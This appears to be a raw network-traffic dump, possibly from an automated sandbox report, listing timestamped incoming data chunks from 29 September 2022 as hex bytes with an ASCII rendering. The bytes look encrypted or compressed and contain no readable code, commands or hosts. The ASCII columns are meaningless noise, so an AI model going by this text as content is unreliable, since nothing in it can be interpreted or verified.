                                                                                                        2022-09-29 12:46:30 UTC12385INData Raw: 4e c8 e8 07 00 0d ed 46 59 56 94 4b 74 e5 3a 55 11 f8 f2 77 00 f3 eb ec 09 d4 59 e3 2c 6d 1f 73 21 d5 75 f1 25 93 03 e5 83 26 e4 36 05 7d dc 36 d1 b0 19 19 53 d9 07 e8 c8 3b d6 8c ae 38 4e b5 9d 47 43 79 df c8 ec ab 6b 20 72 ec 4a b3 e4 54 2f 44 4e ec b5 e7 40 0b bb 31 e7 3f de 30 67 ce 64 3d 93 46 0a 7d ba ca 56 f5 ea cd ce 1f 4f 2f 8c f2 ee a8 b1 be 87 ad 8f a8 cf 4a d2 99 8c ca 6e eb ef 5e 72 71 63 2b 2e 43 e0 eb be e2 7a ab 7d a1 2b 62 3c a8 d1 1c 07 c6 70 08 30 60 77 2d f7 42 19 49 71 1e 15 d7 10 6d f0 69 ec 6e 1d c1 1d 92 7c fe 78 dc 1c f6 70 e4 92 f4 d6 8a 24 7d 12 0b 6a 13 f5 e4 ca 3b 64 82 b8 a5 2b 52 9a db 2f 4d 7b cc 34 9d f6 dd 4f 19 56 2e b5 6b b8 d8 8c 35 93 a9 44 70 8b 09 e5 6f b8 b1 5f 96 6d 3f 9d cc cb 14 8f 12 fd ae 01 df c0 4f a2 40 db
                                                                                                        Data Ascii: NFYVKt:UwY,ms!u%&6}6S;8NGCyk rJT/DN@1?0gd=F}VO/Jn^rqc+.Cz}+b<p0`w-BIqmin|xp$}j;d+R/M{4OV.k5Dpo_m?O@
                                                                                                        2022-09-29 12:46:30 UTC12401INData Raw: 84 67 35 44 f6 5a a8 c7 96 ae 51 14 ea 29 67 e0 aa 54 25 d6 0c 6d ef bc 70 81 5a 85 56 81 52 54 d6 7f 3d 65 73 a7 78 df 1c 3c 1a ff 69 b8 cf d7 51 53 af 42 24 fd e4 cc 8a 0e d2 f1 ca 6e df 03 7c 24 1b c4 3a d7 08 e4 c3 22 3d d6 fd 97 bb f0 c5 23 02 7b 24 bc 0d 73 3f 62 57 29 f0 6e 1d 5f 11 3f 6f 99 aa 4b 07 70 d9 50 51 fd e6 02 51 a0 ae db 76 dc 6d 3c 4c 74 a5 86 8d 4b 03 39 9f 39 cd 78 85 55 85 e5 2a c9 9f ea eb 40 58 3b 2b fc 76 78 ad 5c 99 22 74 35 b3 6c 04 69 fa 3e 62 7c 96 9f 5a 15 a7 4e a9 82 f3 8d de 66 14 bf 71 b8 a3 28 4b 12 20 60 a3 3b 9b 40 5c 7a a4 1f 8c 37 db 77 d2 af fb 8a 59 8b 69 bb ca fa 15 cd 60 06 e1 d8 59 85 d5 6d 90 3e aa fd fb 09 50 f4 21 a2 4d d3 61 ca 40 15 05 13 d7 e4 99 7e ee 86 4c 77 69 d1 4b 40 ee 0c 6e 87 3b 9e 1a 92 35 0d 65
                                                                                                        Data Ascii: g5DZQ)gT%mpZVRT=esx<iQSB$n|$:"=#{$s?bW)n_?oKpPQQvm<LtK99xU*@X;+vx\"t5li>b|ZNfq(K `;@\z7wYi`Ym>P!Ma@~LwiK@n;5e
                                                                                                        2022-09-29 12:46:30 UTC12417INData Raw: 92 57 de 7f b9 b9 25 15 a8 8c 3a 5d ea 22 cd 58 c8 82 76 6a 04 c7 3e b3 72 5c 34 dc f0 ff 29 6b 56 7d 57 e0 36 41 dd bb 5d d1 bf f9 1a f2 d0 c6 a2 1b e8 a1 a8 19 a8 05 a0 a7 98 b8 fa eb 7e 3b 4c 4e e8 3d 8d c4 0e ae c5 90 a5 26 77 ac 47 11 14 91 4e 4e 30 e1 72 7c 59 4c 5e fc 2b 52 2b cb b3 49 77 c8 ff 39 cb e6 56 09 29 cb e8 55 a8 0c 57 50 eb 3a 40 70 e4 3b 7f 20 4b b2 9f 46 08 12 b0 8f a2 2f 1d 03 04 b4 bc bc e8 9c 8d 2f 24 df cd e4 94 ad e7 c9 23 96 42 3e 57 f9 3f f1 e5 71 71 80 f1 47 6f e9 02 bb 57 e0 d5 77 e9 75 e2 71 eb 10 c6 8a b7 5e f2 34 fa 96 08 24 65 97 74 5b a9 80 8e ad 0b 38 09 13 45 c6 e9 66 23 78 46 6e 54 f7 02 75 04 cb 58 7c 29 1b e1 ef 6c 73 b8 7b 7d 92 f5 43 61 84 f4 86 0e 47 e1 5c e7 ae b1 86 02 c3 2d a3 8c a1 3b 95 69 47 14 b7 47 91 28
                                                                                                        Data Ascii: W%:]"Xvj>r\4)kV}W6A]~;LN=&wGNN0r|YL^+R+Iw9V)UWP:@p; KF//$#B>W?qqGoWwuq^4$et[8Ef#xFnTuX|)ls{}CaG\-;iGG(
                                                                                                        2022-09-29 12:46:30 UTC12433INData Raw: 29 c0 b9 82 8e 8d 74 36 99 5b 16 74 c0 96 17 8b dc 9d ac 49 8e 27 2e 75 b1 5c 33 43 2d 7e d3 55 ee b6 c4 7a 6e 09 a6 1f 4c 6b 80 69 e5 4f cb 9e 34 cb 97 ee cc b5 ce 02 5a c6 9c 54 bb 34 a6 9e f2 9c 97 bb d2 c9 61 18 86 ed ac d4 fe 14 e3 81 7e ae 0f 10 67 ea 04 7a ab 02 05 5d 65 20 1b e3 3b d5 44 d5 ff e7 82 38 16 e4 38 a3 b8 48 ba bf d7 99 81 ee 3a b8 55 ad 39 21 e4 64 5d 81 59 68 ac 51 4d e4 16 b5 0b 0b 7f 3c 2d 89 a8 62 61 48 f5 5b 43 2b 8c c1 ed 92 2d ab 17 0a a8 5f 2b b6 b1 db 22 7b 25 c4 1d bf 7c 5d 1b de 73 2e 71 67 dc 35 17 9f 2e f9 b7 a0 19 2f 87 36 ee 1e dd 7d f3 cc f5 a2 2e b9 c6 46 59 1d ab fe 3e a6 0d cd 81 4f 2a 04 cc 99 c0 c9 36 49 03 8d 77 b4 eb 2a b9 b7 b8 72 34 8e 3b 85 a4 8d 57 56 66 4f 7b 93 00 e6 ba 0a 41 65 0d d7 1c bb cb 98 7b c5 c1
                                                                                                        Data Ascii: )t6[tI'.u\3C-~UznLkiO4ZT4a~gz]e ;D88H:U9!d]YhQM<-baH[C+-_+"{%|]s.qg5./6}.FY>O*6Iw*r4;WVfO{Ae{
                                                                                                        2022-09-29 12:46:30 UTC12449INData Raw: 74 68 30 31 f0 b9 ff b4 84 10 c0 30 3a 31 01 85 d0 f6 f5 d7 be ff 55 22 0c 1f 0b 39 dc 60 b8 a3 c6 01 78 c6 76 12 cc 4b 8e b6 69 ec 74 02 34 b5 93 f6 d1 63 ed 60 8f da 91 4d 9c 96 ab 4b 7e 49 b6 66 51 d2 b1 ee a4 6e 60 a0 79 a5 4d c2 4f 58 b1 fc 64 eb 82 85 98 14 34 45 8e de e1 cf 93 f6 e6 4d 4e 98 bd ff a2 74 24 ef 20 62 27 2b cc e7 db 72 df 82 db 84 18 fb f2 5b 79 41 70 f3 26 31 98 88 71 98 30 7e 5d 78 ba e2 28 28 56 84 5a 30 a0 ad ec ee 26 e9 37 62 2d d9 db 38 56 cc c9 69 0f c7 0a d7 6a c9 25 31 59 0e 50 a2 98 cf e2 29 24 36 5e 96 a6 67 e5 92 1e d8 58 8e 15 52 ed be 14 79 ef b6 3b 03 6d c9 79 06 74 21 34 7d 9c 8f 05 b3 b3 54 0b 8d ce 6b 7f 00 ad c5 02 3d c4 98 4b a5 1a bb 40 3a 2e cb 14 dd ec 12 89 ab b4 48 6f ca 27 91 d2 70 0e d6 36 ae 34 30 0c c6 0d
                                                                                                        Data Ascii: th010:1U"9`xvKit4c`MK~IfQn`yMOXd4EMNt$ b'+r[yAp&1q0~]x((VZ0&7b-8Vij%1YP)$6^gXRy;myt!4}Tk=K@:.Ho'p640
                                                                                                        2022-09-29 12:46:30 UTC12465INData Raw: be aa 8a 04 ef 84 00 03 42 3a 87 f9 7a 83 17 70 f1 c7 05 20 59 68 f1 c1 37 68 14 bd 9d f0 6a 0c 2c 7d 47 4d f6 05 48 dd 2d 8b d1 15 6a 05 50 f9 e1 cb ab cf 28 ed b8 5f 3d a7 b3 98 9a b8 53 91 b0 cc 42 7e 4c 2d 0a 74 82 1c 63 99 00 05 59 99 9f 16 9f e1 67 9f ad b7 ae 95 da 0e 6b 9c 5e d9 b6 32 9f 12 c2 8d 01 95 a3 af 28 1d be 1a 89 03 b5 d2 3c 97 e4 85 32 c3 95 d7 f2 eb 2d a0 2f f1 d4 f1 37 d4 38 12 7b 88 85 ca 94 93 6e fb f1 18 0c 74 ef 9a c1 07 57 92 27 a6 b5 0b ea 75 e3 2b 7f fb 9d 82 c9 9a a5 7a 1d e2 b3 ff 71 86 50 41 b6 c0 11 6c 12 d9 a7 87 a0 6d 35 1e ad 31 bd 38 f8 52 88 78 f1 78 28 6f 30 3f 1c 80 66 f5 a9 26 31 f1 b5 f1 75 3e 79 8e 81 00 42 f1 7d 76 d2 66 9a 17 f3 64 08 64 8b b4 c8 53 5a 50 5f fa 80 88 32 ad 2f 97 79 0a c6 0c 0c 1a 53 15 da f1 89
                                                                                                        Data Ascii: B:zp Yh7hj,}GMH-jP(_=SB~L-tcYgk^2(<2-/78{ntW'u+zqPAlm518Rxx(o0?f&1u>yB}vfddSZP_2/yS
                                                                                                        2022-09-29 12:46:30 UTC12481INData Raw: 16 1e 02 af d7 c2 4b a7 e4 ae 36 5d 14 46 04 22 14 ef ad e0 24 f7 e2 57 7b fa e6 09 9f 36 10 87 34 ff fd 55 e3 1e c2 0d 94 c2 0e 63 ba 98 71 8c 40 2e f4 60 69 48 df 0a be 82 2e 7d b9 e2 31 83 e3 b8 3b 79 55 6e 22 25 44 38 33 21 e4 d1 a4 45 02 cc 1b 90 08 da 02 e7 2e 50 23 96 80 51 cb dd 48 d8 b7 7a 62 61 f3 2f 45 f6 79 99 9b 05 d8 2f ab 3a 95 b8 86 39 b5 e3 96 57 97 ae 98 02 e6 9c 19 f3 0d 36 45 f4 a8 c9 21 51 ab 3b 75 08 a2 76 21 90 33 6d c5 9a c7 fa 47 e0 12 c7 97 3b 87 5c f7 a2 65 03 ee d3 4b e6 20 62 09 6c b3 bd 9a 81 39 82 1a 7c 41 77 1f c4 04 1f 21 96 1d 56 26 69 47 e1 7b 17 a8 86 8d 78 16 e7 32 c5 a9 6a df 9d 86 ea 49 14 a0 68 3b 10 f5 d1 ff ff cb 79 33 2d 2d a4 a3 ee 72 f4 a6 0b cc f9 b5 ec 5a 58 22 84 df 72 65 51 da 53 c0 51 f5 7a 15 a9 f6 e0 72
                                                                                                        Data Ascii: K6]F"$W{64Ucq@.`iH.}1;yUn"%D83!E.P#QHzba/Ey/:9W6E!Q;uv!3mG;\eK bl9|Aw!V&iG{x2jIh;y3--rZX"reQSQzr
                                                                                                        2022-09-29 12:46:30 UTC12497INData Raw: c1 4c 58 7b 7d 2b 1a 2f 7c 44 e9 c9 d1 84 34 ec d1 19 ea dd 90 bd 1b a3 a0 ac b8 c8 99 97 5c f4 9b 76 f4 f4 bd 28 d2 6c 8d 80 49 60 50 9f 6d 4e cf bc 90 12 88 81 eb 61 e0 5c 07 46 c7 7a e7 d6 4d e9 10 e7 5f 21 45 be b6 1f a5 83 18 2a 17 ca f8 f2 3a b1 ae 25 6b ce bc ab 16 90 3f e0 5b 4d d8 e1 7a 29 67 aa 0d 60 03 62 16 2a f0 b3 2a f1 41 d4 68 f7 ba 94 9d 24 74 06 f8 16 5e 00 4d b5 e5 62 4f 31 35 dc 52 8b fe c6 8b 7a 80 e1 61 ec 8c d9 a1 5b d8 0f 35 82 c9 87 09 9a 62 a0 ff 97 e0 83 7e eb 92 0a cb 27 0c 0c c4 28 7a ab 95 36 0f 3e e4 55 0f ad 4b 42 89 67 12 72 06 3e ec 20 d8 3f f6 4c ab 2e c2 f1 2b 08 f2 e3 ca 82 ae 8f b6 90 ce 99 09 8c 8a 94 33 2e 50 07 e8 ef 50 be 85 4a ba 33 87 32 a5 ff a5 b1 d5 73 aa bd e2 7b bd 63 28 e1 83 8d 77 93 e8 51 f4 30 89 99 f6
                                                                                                        Data Ascii: LX{}+/|D4\v(lI`PmNa\FzM_!E*:%k?[Mz)g`b**Ah$t^MbO15Rza[5b~'(z6>UKBgr> ?L.+3.PPJ32s{c(wQ0
                                                                                                        2022-09-29 12:46:30 UTC12513INData Raw: 88 41 9a af 96 76 b4 4c 6b c9 e4 c1 13 d8 10 09 4e 80 ea 0e 4d 02 86 ed e8 44 d6 be 2a 56 19 e2 cb b0 2c f2 29 51 3e 17 b7 13 35 e9 7e 40 7e 35 89 5b 70 fd bd 37 26 1b 95 d4 5f 02 15 bc 5b b1 46 46 3e 9f 49 7e a8 d5 0a 6a f1 7b 27 30 78 24 e0 94 4d 2d 0d 75 25 2b b6 e3 9a 1e f4 01 81 5c 49 e5 db 8d df 7f 9c 5c 3d 4b ae 89 fe a5 de 67 63 62 31 4a 9f ff 41 bb ae a1 96 a2 6c 2c 25 2f 6f b4 24 08 5d fd a4 71 e3 3d 4b 13 5f bc 97 1e 96 4c 81 6a 42 88 80 7b 4b 8c 50 a0 a8 14 9c 68 e9 48 08 59 76 56 6f 5d 7c f8 24 6b a2 18 10 aa d5 4f bf 84 ed f9 88 f8 0b 9d f3 a1 ba 55 38 f3 9a 40 02 f6 0b fc 20 74 39 4f e6 3d d0 28 13 82 53 ae ae f5 d9 7a e8 5c ca d5 c7 06 f0 e7 5f a7 2c 9f 99 a5 5b 5b 0e 69 ea c1 aa e8 68 cc cd 0d 5a 3b b6 fb 1f 13 08 39 a5 ca a2 cc 94 a2 25
                                                                                                        Data Ascii: AvLkNMD*V,)Q>5~@~5[p7&_[FF>I~j{'0x$M-u%+\I\=Kgcb1JAl,%/o$]q=K_LjB{KPhHYvVo]|$kOU8@ t9O=(Sz\_,[[ihZ;9%
                                                                                                        2022-09-29 12:46:30 UTC12529INData Raw: 3b f7 1a 52 c0 fe 2d 5c ee 5e 99 ab 38 65 41 4f 10 b3 da 95 68 1d a9 69 f3 e6 b8 b7 1e e0 0b b3 86 db 19 9b 7d 59 ad ce bc d6 0b fe 1d 45 b5 bd 29 ca cf 50 ff 87 34 00 34 0e 33 a9 20 e4 c2 e5 fe c8 18 88 a9 44 70 13 af 5e 69 04 3d be d9 1e b4 97 bf 7b 12 b6 86 17 21 d3 60 2e 97 40 f9 e3 df 70 6d 6c 33 b5 5b 23 6e 08 8e a3 8e 64 e2 94 1f a4 d2 a0 28 ba 64 ec 68 bd 0a 5a d1 c9 14 4f 0c 95 ef bb 49 9c fa 6a 90 a0 c7 f5 fb 15 cf 38 42 31 23 9e f5 d7 8c 6b 5a fb e4 91 2f b3 3e a6 a7 5d 16 ed 15 c8 bb 22 ab c1 35 e7 0c 75 f6 62 39 e8 db ec 8f 9c 1d 44 07 0a 32 f4 79 b6 8b 01 b3 6a 8b 20 fa a0 fb b9 4b 93 4c 24 61 38 6c 69 c3 5c 24 4a 97 03 3f 17 1f 60 ab a1 f9 a6 a5 36 2b 0a 04 0e e7 04 bb 67 0f c6 4f d0 b7 96 a9 27 7a d8 11 77 41 c8 2b 89 61 4c 10 90 16 4f c5
                                                                                                        Data Ascii: ;R-\^8eAOhi}YE)P443 Dp^i={!`.@pml3[#nd(dhZOIj8B1#kZ/>]"5ub9D2yj KL$a8li\$J?`6+gO'zwA+aLO
                                                                                                        2022-09-29 12:46:30 UTC12545INData Raw: f4 95 ea 31 a0 9e f9 e5 9f d0 2a ba 8c 3f 78 e7 6b c2 53 eb 7d d6 81 7c d8 49 d0 8b 2e 43 70 ca 4a 51 66 fb 64 c1 6d 8d 14 2c d5 6e 24 82 21 dd a9 95 ed 71 aa 8f d1 bb b9 fa a6 5b ba 9a b9 89 b1 a0 6c dd 75 e7 64 49 e7 ca 22 79 84 1d df ea 83 77 85 67 73 cc 9e 1e f8 9c 0d 06 75 d3 99 c7 d9 87 f8 3a d9 b3 63 a9 3f da 96 91 1e 8f f1 c3 6f 76 6c 69 cd 13 90 a8 88 06 a1 ae 43 07 1a 41 87 30 d3 9e 58 d5 d2 02 3f 00 8f 0a 09 72 62 03 9d 79 fa fd 88 d6 2b 60 d4 ef ba 92 cd 47 63 86 df 3d 66 98 45 47 96 e5 05 df 33 13 47 11 35 35 5f cb 45 2d 1a fe 88 30 bc 69 77 5b 04 32 af 10 46 1e 97 9c 7d e4 ff 8a bd 5d 5b 92 6f a9 dc 7e b9 06 33 56 98 b9 c2 fc 8a 7e 61 60 05 61 dd 1e a2 32 68 b2 1f 97 36 61 18 a2 64 f1 f8 8e e1 aa 3d df bb 59 f0 86 08 13 2f 81 ce d5 79 9b 7e
                                                                                                        Data Ascii: 1*?xkS}|I.CpJQfdm,n$!q[ludI"ywgsu:c?ovliCA0X?rby+`Gc=fEG3G55_E-0iw[2F}][o~3V~a`a2h6ad=Y/y~
                                                                                                        2022-09-29 12:46:30 UTC12561INData Raw: 5d 1c 92 b0 22 c3 39 b4 e4 dd e6 41 45 e8 13 9d f8 0d 6c cf b3 01 0d 00 24 d8 31 95 9c 21 fe ae 24 d6 3e 57 33 64 b1 e8 d8 f7 f5 eb d6 9b b3 2e b6 3e 42 cf a5 9c 59 c6 04 0e 95 74 6c cc f6 44 5a 14 ef 96 81 9c dc 17 a3 7c 17 c1 54 69 12 59 f1 e3 79 5b a0 43 01 fc 96 7b cd d4 42 60 c6 27 0d 2f 98 35 56 9b e0 71 e2 60 be f4 1d 89 d4 25 9a 2b 57 8f e3 f9 c6 6a dd 63 2f 6a 1f 9c 16 64 d6 d5 e4 52 8f 2e 4f dd 46 d4 56 b4 e2 8a 96 76 6c 37 1b 6a 99 2b 98 69 e5 88 7a 55 67 8d d7 27 2e e3 3d a6 f6 99 6e 21 99 9d 9f b4 d9 23 de a8 be 0a 50 f7 09 f8 07 24 16 c3 47 ea 9c 4a 17 b1 de 3d a1 44 0b 4d 92 ca 78 17 e5 37 0c f1 a1 99 44 a8 00 09 3a 3e e8 d1 2e ac 1b 74 9d a1 5c cc a0 d4 c5 18 58 19 33 07 20 c5 29 66 a9 6e af 0f 7a 54 bf 32 68 3b e7 06 76 e9 f3 a8 40 ed 66
                                                                                                        Data Ascii: ]"9AEl$1!$>W3d.>BYtlDZ|TiYy[C{B`'/5Vq`%+Wjc/jdR.OFVvl7j+izUg'.=n!#P$GJ=DMx7D:>.t\X3 )fnzT2h;v@f
                                                                                                        2022-09-29 12:46:30 UTC12577INData Raw: cf 92 ae e6 d8 a8 dd 50 7c 49 f8 40 4e 88 2f 9b 80 27 3d a9 42 cd 58 97 45 e0 df 1d 23 ca 86 7d 55 9d ac bf cd f2 98 1e 27 9c 30 d4 35 a2 23 fb 9e 2d 01 db 11 c2 08 9e fb 37 d6 c4 36 b2 e5 2e 32 58 19 d5 8e 90 52 34 9c 0b 1a ca 75 49 85 f0 e4 68 26 d3 d1 ee 6d fc 90 90 49 05 cb 03 3f 66 ef 0e 87 ab 32 87 7d 62 7b 35 4d cd 12 4d 2e 06 11 07 64 b3 3d 68 5d a0 5a 9e 4a 24 a9 ba 48 e4 43 ac 3b 24 23 c2 6b d5 e5 60 97 79 40 dc 39 59 1f 97 b3 17 a7 cd 27 e1 68 35 45 33 32 3c 30 b3 e7 b0 6a 4c 23 b5 20 38 a9 40 9f 53 39 fb 29 b3 da 50 6a fb db 78 1a db cd 77 c8 eb 59 05 68 eb 0d 5b 04 a6 da 9a 02 da de 5b 53 67 e3 97 1b de 96 c6 ff 67 33 f4 49 ca c7 36 00 04 49 36 04 f6 d9 ac 64 50 05 9a ff 1a 40 44 70 c4 b6 d9 66 6b c4 9d 1f d4 62 67 14 a4 db 76 17 89 06 83 2d
                                                                                                        Data Ascii: P|I@N/'=BXE#}U'05#-76.2XR4uIh&mI?f2}b{5MM.d=h]ZJ$HC;$#k`y@9Y'h5E32<0jL# 8@S9)PjxwYh[[Sgg3I6I6dP@Dpfkbgv-
                                                                                                        2022-09-29 12:46:30 UTC12593INData Raw: d8 42 41 34 ce 8e fd 63 26 37 aa 06 1a bf 1c d3 1d 0e 44 2d f8 08 74 30 02 3a 41 c8 88 23 0f f4 33 7d aa 53 6d 37 83 45 d1 d1 dc 3e 40 ec d7 68 8d e3 01 c3 af 6a ce 79 28 1e 7f dd f7 17 b2 d7 86 45 98 9b 74 29 6a 0f 92 e2 1a db db 28 bc ea c0 be 4e c4 46 6f 8b 39 3b aa b0 bd 74 af 7b b0 97 0b 7f 8d 12 6a eb a6 67 b2 9e 69 1b 03 24 79 50 3c b9 1b 93 15 3c 44 3e 9c be 1c 77 ac 19 00 bf 43 f9 e2 ea 0d 0a 41 a4 55 64 3a 2f 59 5c c4 e0 5f 03 a4 bb 35 d1 40 c3 6d 95 69 9c de c9 40 7e 0b 3c eb 00 86 f7 fa 5d 3d d9 57 fa e7 f2 ad 17 c3 59 c7 93 80 e3 7b 79 60 67 f4 b8 d6 53 c3 ee a6 4a 46 fd 9c 8a ed 5f 49 cd 28 f6 eb a5 4d 0c d1 02 fa fd 58 ca 4c 54 95 34 27 b2 3e 49 66 98 f7 fc 96 c0 76 24 40 44 ad 83 96 e0 60 3a 60 8c 6c b9 c8 55 57 be 0e 55 d3 1d d0 c1 66 00
                                                                                                        Data Ascii: BA4c&7D-t0:A#3}Sm7E>@hjy(Et)j(NFo9;t{jgi$yP<<D>wCAUd:/Y\_5@mi@~<]=WY{y`gSJF_I(MXLT4'>Ifv$@D`:`lUWUf
                                                                                                        2022-09-29 12:46:30 UTC12609INData Raw: a0 4c 6b b0 9b 62 e2 e0 40 45 c9 f0 56 4b e7 7c b5 34 f0 be c8 c5 64 fc c3 77 a3 40 3f 71 f2 8c 19 c0 dc 6b ed f7 e3 df cd b6 a4 ef c3 6d 89 a3 c1 88 9d 1a 9f 37 f6 15 8c 9c 59 32 f5 88 f3 11 b9 fd 99 c3 c6 8a 31 17 4d 61 46 c3 5c 58 8c 34 21 a7 47 f7 79 c7 5f 6a 89 3e 77 f7 b0 0a c0 04 8c dc d9 a9 eb 64 a4 c0 92 32 4d 8c c0 13 60 b9 83 c1 0d 3b 3e 45 b6 01 9f 68 07 03 4d b7 11 47 80 f6 f0 81 ce c1 b7 e5 de 43 16 47 a3 03 51 6b 3f 0f 89 d0 79 07 f4 43 9e 56 f0 66 05 d1 86 ae b5 cf 95 a5 a4 6a ab cd 79 fa d1 ac c5 5e 61 15 6b 62 82 c4 b0 35 fa 54 b3 e4 e9 0b 4f a7 3e af 96 9c 29 ed b1 fa 32 78 21 b0 ef 0e 0d b1 a7 44 b8 96 22 d5 f5 27 81 f6 24 33 62 26 b0 e4 28 f7 e5 bb fa 92 f2 17 c5 5d 81 61 36 1f c7 76 ea 3a e4 e4 dc cd df 36 c3 c7 e7 09 f2 6d 4d 21 3a
                                                                                                        Data Ascii: Lkb@EVK|4dw@?qkm7Y21MaF\X4!Gy_j>wd2M`;>EhMGCGQk?yCVfjy^akb5TO>)2x!D"'$3b&(]a6v:6mM!:
                                                                                                        2022-09-29 12:46:30 UTC12625INData Raw: 3c 4a 9f 0f 7b 5e 5f 75 e1 16 cd 0b 38 2b cd c4 8c e0 90 cb b0 22 54 8f c5 3c f0 fa d4 bc ef 4b f0 73 d0 28 97 fb be 18 d9 a4 9d 32 31 d5 82 48 58 87 e9 9b 39 da 82 b4 18 8f b3 3f a2 ba 55 d5 a8 20 90 99 3e 86 72 35 f4 c1 cc 74 b0 f6 dc e9 92 f8 9d f4 ea ad 40 46 6f 09 1a 6b 0e e0 e3 ce 64 c5 81 e5 96 b1 33 40 aa 34 7d 04 1f 02 e2 89 62 77 c6 36 fd c8 5e 22 3a 3d b5 b0 b0 3e 5b 5a 22 32 81 c7 81 40 fd ca f2 05 31 00 23 9d e3 f1 01 10 8e b5 59 b9 c4 60 ce 1a 40 99 10 a3 e1 c4 64 13 e9 20 53 83 31 23 61 b7 25 57 38 4e 81 ab 67 b2 71 0a d2 bd 10 f2 72 b1 6a a3 3e fe ba 14 88 18 86 95 f3 a2 e1 11 b8 92 ce 3e a3 39 21 df 1f 30 15 26 ee 5a fd 0e f2 ab d6 7d 68 42 60 69 27 d8 b1 82 d1 2a 11 de 44 31 cc 6d aa 85 74 49 bb dc 21 67 30 53 e9 0b 2a 65 ea 50 d3 34 14
                                                                                                        Data Ascii: <J{^_u8+"T<Ks(21HX9?U >r5t@Fokd3@4}bw6^":=>[Z"2@1#Y`@d S1#a%W8Ngqrj>>9!0&Z}hB`i'*D1mtI!g0S*eP4
                                                                                                        2022-09-29 12:46:30 UTC12641INData Raw: e3 4a fb 76 25 28 9a c5 15 ea 25 fc 9f 0d 17 d6 4b 2f 6c 90 cb 17 06 1b 01 08 a6 81 b6 3b 1b 9e ab 03 1b 18 6c 1f c3 f1 0f 23 49 7c 8d 92 88 cc 02 d0 c5 ef 0f 94 b0 fb 9c 94 fa d1 7f 61 55 22 3f 92 52 0a a4 c0 7e 9e 78 4b 31 e1 35 70 62 af 47 4b 48 ec 37 5c ef 17 0e ba 4f 62 e2 e8 a9 14 68 2c c7 66 d8 79 ff 66 40 75 99 51 87 d2 f0 a0 73 a2 13 23 ac bb aa c4 e0 0f 77 27 d6 a2 28 37 45 33 af 5d 2f e7 a5 ea a9 d0 e3 3a ef ee f0 11 61 11 53 38 bc c8 99 a4 49 d1 eb cd d9 00 8e aa 18 38 f1 a6 ee d8 29 8e d7 5f b5 27 53 17 f5 0f 77 8f 59 4d 40 7f 54 ac b6 50 f9 9a e9 1d 6f 9c 17 e3 ce 18 93 fd 31 05 20 74 3d ca af 51 7e 53 ec 2c 8a 90 f8 84 d9 24 cb 07 5a f0 e0 7c 9e 0c f8 f5 47 e4 54 75 d5 f3 1f d7 c7 e8 f9 a5 58 21 8f 24 82 71 aa f3 f2 7f fc b0 09 a3 3e 10 38
                                                                                                        Data Ascii: Jv%(%K/l;l#I|aU"?R~xK15pbGKH7\Obh,fyf@uQs#w'(7E3]/:aS8I8)_'SwYM@TPo1 t=Q~S,$Z|GTuX!$q>8
                                                                                                        2022-09-29 12:46:30 UTC12657INData Raw: 06 f1 be 45 8d d5 3f 1a 69 6b 17 2b 6d 82 81 90 52 d1 e8 51 c5 f2 39 e8 e7 c6 c1 b1 9a dc 57 2c 05 bf 14 87 89 5b 34 65 4f fc 41 72 24 9e dc 63 e6 cc 0c 7a 54 0f 52 c5 88 cc 72 52 c7 09 2c de e5 ef 09 13 a4 d1 97 a1 ee 28 b6 54 83 74 38 11 28 9c 6a de dc 6a 2b 93 d9 3a f9 cd 4d cb 78 54 f3 c6 88 91 99 54 11 b2 32 05 66 81 33 5e f9 18 7a 37 3b 50 0e 23 cc b3 97 83 6f e9 57 8e 10 b6 dc b8 db 16 4f 36 a4 f2 f2 c6 fc 5f cc 4a 85 27 93 48 87 1d 8a 0e 54 c4 a0 71 51 e2 04 3c e2 26 64 02 cc 51 8a 0a cb f1 eb 43 af da 6b 5c ad be 6e 4a 87 47 84 23 75 b9 50 a5 51 e0 0a 32 e1 cc 62 fb cc b7 40 9a 62 26 c8 43 ae 59 52 f0 fc 22 9f 29 1b 83 91 87 bb e3 07 78 a4 5c 24 3f 6b dc 25 10 e4 ab d7 7e 38 59 d0 77 4f 61 6a 64 1a 7d 09 76 61 97 6e a8 ff a9 c0 f9 1b 6a 75 47 7a
                                                                                                        Data Ascii: E?ik+mRQ9W,[4eOAr$czTRrR,(Tt8(jj+:MxTT2f3^z7;P#oWO6_J'HTqQ<&dQCk\nJG#uPQ2b@b&CYR")x\$?k%~8YwOajd}vanjuGz
                                                                                                        2022-09-29 12:46:30 UTC12673INData Raw: 4a 13 98 5b 87 9d 3c b9 dd c6 88 42 5d 72 56 ac e3 94 e4 a8 ec 73 91 2d 73 04 89 24 b2 9f 59 85 c1 99 b9 a9 ad 39 8f f2 f2 e6 47 58 67 73 81 26 29 97 56 33 a1 34 5d b8 25 7b c4 c4 57 44 3b 92 ea 4c aa 09 93 81 73 3f 80 cc f5 4c 1b d9 f2 c2 82 44 ca c1 cc b4 fb e5 e0 4b e4 ba 0a 17 70 7b fe c1 fc 63 40 26 92 a3 4c 75 b2 81 95 0c 60 c2 0a c0 ab 7f 46 e0 34 58 30 38 32 20 ef 2a 15 23 35 36 0e d6 d3 f7 c1 31 66 58 6b 43 75 c1 a3 5c 1a a5 9d a1 76 47 dd cc 5e b1 a8 29 33 4e 6e 0f dc ad f5 f9 ac 7b d2 d2 9b 84 43 87 69 cd 5c 20 5d 8a 61 c2 ca 39 25 9d 26 28 36 8f 5e de db 61 a6 2b e1 15 8e 1b 5e fb 35 c9 32 27 2d fd 59 68 41 73 17 52 f4 59 0a 74 23 8e f5 f1 05 e0 5a 16 47 18 62 2c 87 10 bb a3 f8 87 04 ed 7d 66 36 d5 11 65 e4 c3 8a 68 e8 f2 92 45 f8 5b 42 89 9c
                                                                                                        Data Ascii: J[<B]rVs-s$Y9GXgs&)V34]%{WD;Ls?LDKp{c@&Lu`F4X082 *#561fXkCu\vG^)3Nn{Ci\ ]a9%&(6^a+^52'-YhAsRYt#ZGb,}f6ehE[B
